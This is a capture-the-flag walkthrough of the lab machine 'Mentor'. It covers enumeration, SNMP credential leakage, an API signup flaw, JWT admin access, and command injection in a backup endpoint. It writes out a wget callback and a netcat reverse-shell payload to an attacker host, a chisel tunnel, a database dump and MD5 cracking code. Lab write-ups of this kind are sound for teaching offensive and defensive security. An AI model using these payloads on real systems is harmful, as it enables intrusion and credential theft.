TCP Scan
> TARGET=10.129.85.27 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://mentorquotes.htb/
- Found domain in the http-title redirect (add it to /etc/hosts): mentorquotes.htb
Web Enum
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://mentorquotes.htb/" -H "Host: FUZZ.mentorquotes.htb" --hl 9
000000051: 404 0 L 2 W 22 Ch "api"
> dirsearch -u http://api.mentorquotes.htb/
[19:48:13] 307 - 0B - /admin -> http://api.mentorquotes.htb/admin/
[19:48:15] 422 - 186B - /admin/
[19:48:15] 422 - 186B - /admin/?/login
[19:48:16] 307 - 0B - /admin/backup/ -> http://api.mentorquotes.htb/admin/backup
[19:48:38] 405 - 31B - /auth/login
[19:48:56] 200 - 969B - /docs
[19:48:56] 307 - 0B - /docs/ -> http://api.mentorquotes.htb/docs
[19:49:46] 403 - 285B - /server-status/
[19:49:46] 403 - 285B - /server-status
[19:50:03] 307 - 0B - /users -> http://api.mentorquotes.htb/users/
[19:50:03] 307 - 0B - /users/admin.php -> http://api.mentorquotes.htb/users/admin.php/
[19:50:03] 422 - 186B - /users/
[19:50:03] 307 - 0B - /users/admin -> http://api.mentorquotes.htb/users/admin/
[19:50:03] 307 - 0B - /users/login -> http://api.mentorquotes.htb/users/login/
[19:50:03] 307 - 0B - /users/login.php -> http://api.mentorquotes.htb/users/login.php/
[19:50:03] 307 - 0B - /users/login.aspx -> http://api.mentorquotes.htb/users/login.aspx/
[19:50:03] 307 - 0B - /users/login.html -> http://api.mentorquotes.htb/users/login.html/
[19:50:03] 307 - 0B - /users/login.jsp -> http://api.mentorquotes.htb/users/login.jsp/
[19:50:03] 307 - 0B - /users/login.js -> http://api.mentorquotes.htb/users/login.js/
- Browsing to http://api.mentorquotes.htb/docs (the API's interactive docs; the 422 bodies above are the FastAPI validation format) reveals james's email: james@mentorquotes.htb
Intended: snmpwalk
- SNMP (UDP 161) is running on the target; it does not show up in the TCP scan above, so a UDP scan or a direct snmpwalk with a guessed community string is needed. The community string internal is valid, and walking the tree exposes hrSWRunParameters (.1.3.6.1.2.1.25.4.2.1.5), the argument lists of running processes. One process is a login script started with a password on its command line:
> snmpwalk -v2c -c internal mentorquotes.htb
iso.3.6.1.2.1.25.4.2.1.5.2045 = STRING: "/usr/local/bin/login.py k******************3"
- This is the password for the API user james (email james@mentorquotes.htb).
Unintended way (patched)
- Tampering with the signup method
http://api.mentorquotes.htb/docs#/Auth/create_user_auth_signup_post
: it accepted a second account with the existing username james as long as the email was new, so we can register "james" with an email we control using the following payload.
{
"email": "james@meow.com",
"username": "james",
"password": "test1234"
}
Login as james
- Log in via
http://api.mentorquotes.htb/docs#/Auth/login_auth_login_post
with the same payload shape and either credential set (james@mentorquotes.htb with the snmpwalk password, or the self-registered james@meow.com / test1234) to receive a JWT. The token below is the one issued for the self-registered account:
# payload
{
"email": "james@mentorquotes.htb",
"username": "james",
"password": "<password>"
}
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW93LmNvbSJ9.uUc8K0Weo06PoaonawiZOo_wEcdQE8DWNSRXvrwSaGU
- The token is accepted by the /admin section:
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/
{"admin_funcs":{"check db connection":"/check","backup the application":"/backup"}}
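Decoding the token above (an added example written for this page, not code from the box or its API) shows what the server signed: a username claim and the email we chose at signup. Since /admin accepted this token, authorization is evidently keyed on the username claim alone, which is why registering a second "james" worked. The HS256 secret is unknown, so `verify_hs256` only shows how a verifier checks the signature, and `is_privileged_username` is an assumed model of the server-side check, not the API's code.

```python
import base64
import hashlib
import hmac
import json

# The token returned by /auth/login for the self-registered james@meow.com account (from the page).
TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW93LmNvbSJ9."
    "uUc8K0Weo06PoaonawiZOo_wEcdQE8DWNSRXvrwSaGU"
)


def b64url_decode(segment):
    """JWT segments are unpadded base64url; restore the padding before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token):
    """Return (header, payload) without checking the signature; enough to read the claims."""
    header_b64, payload_b64, _signature_b64 = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def verify_hs256(token, secret):
    """Recompute HMAC-SHA256 over header.payload and compare it to the signature segment."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(signature_b64))


def is_privileged_username(payload, admin_usernames=("james",)):
    """Assumed model of the API's /admin check: only the username claim is consulted,
    so any account whose username is james passes, whatever its email."""
    return payload.get("username") in admin_usernames


if __name__ == "__main__":
    header, payload = decode_jwt_unverified(TOKEN)
    print("header :", header)
    print("payload:", payload)
    print("admin? :", is_privileged_username(payload))
    # The real secret is unknown, so a guessed one must fail verification.
    print("verifies with guessed secret:", verify_hs256(TOKEN, b"not-the-real-secret"))
```

The fix on the server side is to treat (username, email) as the identity, or simply to enforce username uniqueness at signup; the token format itself is not the problem.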
- The two paths under /admin respond as follows:
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/check
{"details":"Not implemented yet!"}
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/backup
{"detail":"Method Not Allowed"}
# a POST without a body returns a validation error, which tells us the endpoint takes a JSON body
{"detail":[{"loc":["body"],"msg":"field required","type":"value_error.missing"}]}
# the expected payload is a JSON object with body and path fields
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d "{\"body\":\"test\",\"path\":\"test\"}"
- Further enumeration shows the path parameter is passed to a shell: a backtick command substitution inside it executes on the server. Confirm it out-of-band by running a listener on the attacker host (e.g. python3 -m http.server 80) and watching for the wget callback:
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `wget http://<ip>`"}'
- The same injection point gives a reverse shell (start the listener first, e.g. nc -lvnp 4444):
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <attacker-ip> 4444 >/tmp/f`"}'
- The shell runs as root in the API's environment (note the # prompt), and the user flag is readable from /home/svc:
/home/svc # cat user.txt
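The root cause is the usual one: the backup handler hands path to a shell. The API's source is not on the page, so the snippet below is a constructed, added example (mine, not the box's code) that reproduces the pattern with echo standing in for the real archiving command and a harmless `echo INJECTED` in place of the page's wget probe, so it runs offline. It shows the two fixes a practitioner would apply: run the command as an argv list with no shell so metacharacters are passed through literally, and validate the path against an allowlist before it is used at all. The regex and the relative-path policy are assumptions for illustration.

```python
import re
import subprocess

# Constructed stand-in for the /admin/backup handler; `echo` replaces whatever archive command
# the real service runs. Only the shell-vs-argv handling of `path` matters here.

# Probe payload in the spirit of the page's one: a command substitution inside the path field.
INJECTED_PATH = "test `echo INJECTED`"


def run_backup_unsafe(path):
    """Vulnerable pattern: user input interpolated into a command line run by /bin/sh.
    Backticks, $(), ;, | and & inside `path` are interpreted by the shell."""
    cmd = f"echo saved backup to {path}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def run_backup_noshell(path):
    """Fix 1: argv list, no shell. The same string reaches the program as one literal argument."""
    out = subprocess.run(["echo", "saved backup to", path], capture_output=True, text=True)
    return out.stdout.strip()


# Fix 2: allowlist the path shape before it goes anywhere near a command (assumed policy:
# relative names only, safe characters only, no '..' components).
SAFE_PATH = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_./-]{0,127}")


def is_safe_backup_path(path):
    """True only for paths that match the allowlist and contain no '..' component."""
    if SAFE_PATH.fullmatch(path) is None:
        return False
    return ".." not in path.split("/")


def run_backup_safe(path):
    """Both fixes together: validate first, then execute without a shell."""
    if not is_safe_backup_path(path):
        raise ValueError(f"rejected backup path: {path!r}")
    return run_backup_noshell(path)


if __name__ == "__main__":
    print("shell=True :", run_backup_unsafe(INJECTED_PATH))   # INJECTED appears: the substitution ran
    print("argv list  :", run_backup_noshell(INJECTED_PATH))  # backticks are printed literally
    print("allowlist  :", is_safe_backup_path(INJECTED_PATH)) # False
    print("clean path :", run_backup_safe("backups/mentor.tar"))
```

Validation on its own is not enough if the command is still built as a string; the argv form is the fix, and the allowlist is defence in depth against path traversal and option injection.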
SSH access as svc
- Locate /app_backkup.tar, extract it and examine the script /app/app/db.py from it: the Postgres connection string uses the hard-coded default credentials postgres:postgres and points at 172.22.0.1, which is reachable from the shell but not from the attacker host
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")
- Forward the database port back to the attacker with chisel: the R: syntax opens a reverse tunnel, so 127.0.0.1:55432 on the attacker host is relayed through the compromised host to 172.22.0.1:5432
# on kali
> chisel server -p 9999 --reverse
# on target (upload the chisel binary first)
> chisel client --max-retry-count=1 <attacker-ip>:9999 R:55432:172.22.0.1:5432
- Log in to Postgres through the forwarded port (password postgres, from the connection string) and dump the users table
> psql -h 127.0.0.1 -p 55432 -Upostgres -W -d mentorquotes_db
mentorquotes_db=# \dt
List of relations
Schema | Name | Type | Owner
--------+----------+-------+----------
public | cmd_exec | table | postgres
public | quotes | table | postgres
public | users | table | postgres
(3 rows)
mentorquotes_db=# select * from users;
id | email | username | password
----+------------------------+-------------+----------------------------------
1 | james@mentorquotes.htb | james | 7ccdcd8c05b59add9c198d492b36****
2 | svc@mentorquotes.htb | service_acc | 53f22d0dfa10dce7e29cd31f4f95****
4 | james@meow.com | james | 16d7a4fca7442dda3ad93c9a726597e4
- The stored passwords are 32-character hex strings, i.e. unsalted MD5 (row 4 is the account we registered ourselves, so its hash is that of test1234). svc's hash
53f22d0dfa10dce7e29cd31f4f95****
can be cracked on https://crackstation.net/
- The recovered password allows logging in to the target via ssh as svc
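Before throwing the hashes at a cracker it is worth confirming the scheme, and the table gives us a free oracle: row 4 is the account we registered with test1234, so hashing that password and comparing it to the stored value tells us whether these are plain unsalted MD5. The script below is an added example (not the box's code) doing exactly that and then running a dictionary attack over a constructed four-word list; the redacted hashes stay redacted, and a real run would read rockyou.txt or feed the hashes to hashcat -m 0 instead.

```python
import hashlib
import re

# Rows as printed by psql on the page; two hashes are redacted there and stay redacted here.
USERS = [
    (1, "james@mentorquotes.htb", "james", "7ccdcd8c05b59add9c198d492b36****"),
    (2, "svc@mentorquotes.htb", "service_acc", "53f22d0dfa10dce7e29cd31f4f95****"),
    (4, "james@meow.com", "james", "16d7a4fca7442dda3ad93c9a726597e4"),
]

# Password we chose at signup for row 4 (see the unintended-way payload above).
KNOWN_PASSWORD = "test1234"

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["password", "mentor", "test1234", "Password1"]


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def looks_like_unsalted_md5(stored):
    """32 lowercase hex chars and nothing else: a 128-bit digest with no salt field."""
    return re.fullmatch(r"[0-9a-f]{32}", stored) is not None


def scheme_confirmed(known_password, stored):
    """Oracle check: if our own password hashes to our own row, the scheme is plain MD5."""
    return md5_hex(known_password) == stored


def crack_md5(stored, words):
    """Dictionary attack; returns the matching word or None."""
    for word in words:
        if md5_hex(word) == stored:
            return word
    return None


def crack_users(users, words):
    """Map row id -> recovered password (None where the hash is redacted or not in the list).
    Keyed by id because the username james appears twice."""
    return {
        row_id: crack_md5(stored, words) if looks_like_unsalted_md5(stored) else None
        for row_id, _email, _user, stored in users
    }


if __name__ == "__main__":
    print("row 4 is md5(test1234):", scheme_confirmed(KNOWN_PASSWORD, USERS[2][3]))
    for row_id, recovered in crack_users(USERS, WORDLIST).items():
        print(row_id, recovered)
```

The same oracle trick applies whenever you can create an account in the application whose password store you later dump: one known plaintext settles hash type, salting and encoding before any cracking time is spent.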
PE
- Examine /etc/snmp/snmpd.conf: the SNMPv3 bootstrap user is created with an MD5 auth passphrase, and that passphrase is reused as james' system password
createUser bootstrap MD5 ******************* DES
svc@mentor:~$ su - james
Password:
james@mentor:~$ sudo -l
[sudo] password for james:
Matching Defaults entries for james on mentor:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User james may run the following commands on mentor:
(ALL) /bin/sh
james@mentor:~$ sudo /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)